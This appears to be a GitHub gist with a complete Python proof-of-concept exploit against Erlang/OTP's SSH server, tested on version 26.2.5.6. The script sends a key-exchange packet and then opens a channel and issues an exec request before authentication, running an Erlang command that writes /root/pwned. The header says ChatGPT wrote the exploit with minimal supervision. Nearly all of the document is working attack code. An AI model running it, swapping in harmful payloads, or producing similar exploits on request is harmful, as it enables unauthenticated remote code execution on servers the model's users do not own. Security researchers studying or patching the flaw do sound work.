Created
April 17, 2025 20:44
-
-
Save gdbinit/e08e95ce77e031cd223c537ef67ed638 to your computer and use it in GitHub Desktop.
Erlang/OTP SSH Exploit PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Erlang/OTP SSH Exploit | |
| # | |
| # Written by ChatGPT with minimal supervision starting from the test case | |
| # Tested against Erlang/OTP 26.2.5.6 | |
| # | |
| # Have fun, | |
| # fG! | |
| # | |
| import socket | |
| import os | |
| import struct | |
| import time | |
| SSH_PORT = 2222 | |
| SSH_SERVER = '127.0.0.1' | |
| def build_ssh_string(s): | |
| return struct.pack('>I', len(s)) + s.encode() | |
| def random_bytes(n): | |
| return os.urandom(n) | |
| def build_kexinit_packet(): | |
| msg_type = b'\x14' # SSH_MSG_KEXINIT | |
| cookie = random_bytes(16) | |
| kex_algorithms = build_ssh_string('curve25519-sha256,[email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c') | |
| server_host_key_algorithms = build_ssh_string('[email protected],[email protected],[email protected],ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,[email protected],[email protected],[email protected],[email protected],ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa') | |
| encryption_algorithms = build_ssh_string('[email protected],aes128-ctr,aes192-ctr,aes256-ctr,[email protected],[email protected]') | |
| mac_algorithms = build_ssh_string('[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],hmac-sha2-256,hmac-sha2-512,hmac-sha1') | |
| compression_algorithms = build_ssh_string('none,[email protected],zlib') | |
| parts = [ | |
| kex_algorithms, | |
| server_host_key_algorithms, | |
| encryption_algorithms, | |
| encryption_algorithms, | |
| mac_algorithms, | |
| mac_algorithms, | |
| compression_algorithms, | |
| compression_algorithms, | |
| build_ssh_string(''), # languages_client_to_server | |
| build_ssh_string('') # languages_server_to_client | |
| ] | |
| first_kex_packet_follows = b'\x00' | |
| reserved = b'\x00\x00\x00\x00' | |
| payload = msg_type + cookie + b''.join(parts) + first_kex_packet_follows + reserved | |
| return wrap_packet(payload) | |
| def wrap_packet(payload): | |
| block_size = 8 | |
| padding_length = block_size - ((len(payload) + 5) % block_size) | |
| if padding_length < 4: | |
| padding_length += block_size | |
| padding = os.urandom(padding_length) | |
| packet_length = len(payload) + padding_length + 1 | |
| packet = struct.pack('>I', packet_length) + bytes([padding_length]) + payload + padding | |
| return packet | |
| def build_channel_open(): | |
| msg_type = b'\x5a' | |
| channel_type = build_ssh_string('session') | |
| sender_channel = struct.pack('>I', 0) | |
| initial_window_size = struct.pack('>I', 0x68000) | |
| max_packet_size = struct.pack('>I', 0x10000) | |
| payload = msg_type + channel_type + sender_channel + initial_window_size + max_packet_size | |
| return wrap_packet(payload) | |
| def build_channel_request(): | |
| msg_type = b'\x62' | |
| recipient_channel = struct.pack('>I', 0) | |
| request_type = build_ssh_string('exec') | |
| want_reply = b'\x01' | |
| # the command we want to send | |
| command = build_ssh_string('file:write_file("/root/pwned", "hello!").') | |
| payload = msg_type + recipient_channel + request_type + want_reply + command | |
| return wrap_packet(payload) | |
| def recv_packet(sock): | |
| hdr = sock.recv(5) | |
| if len(hdr) < 5: | |
| raise ValueError("Incomplete SSH packet header received") | |
| packet_length = struct.unpack('>I', hdr[:4])[0] | |
| padding_length = hdr[4] | |
| body = sock.recv(packet_length - 1) | |
| payload = body[:packet_length - padding_length - 1] | |
| msg_type = payload[0] | |
| return msg_type, payload | |
| def main(): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((SSH_SERVER, SSH_PORT)) | |
| # Step 1: Receive banner | |
| banner = s.recv(256) | |
| print(f"[+] Server banner: {banner.decode().strip()}") | |
| # Step 2: Send client banner | |
| client_banner = b'SSH-2.0-EarlyRCE_KEXINIT_Test\r\n' | |
| s.sendall(client_banner) | |
| print("[+] Sent client banner") | |
| time.sleep(0.5) | |
| # Step 3: Send KEXINIT | |
| kexinit_packet = build_kexinit_packet() | |
| s.sendall(kexinit_packet) | |
| print("[+] Sent valid SSH_MSG_KEXINIT") | |
| # Step 4: Receive server response | |
| try: | |
| msg_type, payload = recv_packet(s) | |
| print(f"[+] Received server message type: {msg_type:#04x}") | |
| if msg_type == 0x14: | |
| print("[*] Server responded with SSH_MSG_KEXINIT (as expected).") | |
| print(payload) | |
| else: | |
| print(f"[*] Server responded with unexpected message: type {msg_type}") | |
| except Exception as e: | |
| print(f"[-] Error reading server response: {e}") | |
| # 4. Send CHANNEL_OPEN early | |
| s.sendall(build_channel_open()) | |
| print("[+] Sent SSH_MSG_CHANNEL_OPEN (early)") | |
| time.sleep(0.5) | |
| # 5. Send CHANNEL_REQUEST early | |
| s.sendall(build_channel_request()) | |
| print("[+] Sent SSH_MSG_CHANNEL_REQUEST (early)") | |
| # 6. Receive server's reaction | |
| try: | |
| response = s.recv(1024) | |
| print("[+] Server response:", response) | |
| except Exception as e: | |
| print("[-] Error receiving response:", e) | |
| s.close() | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment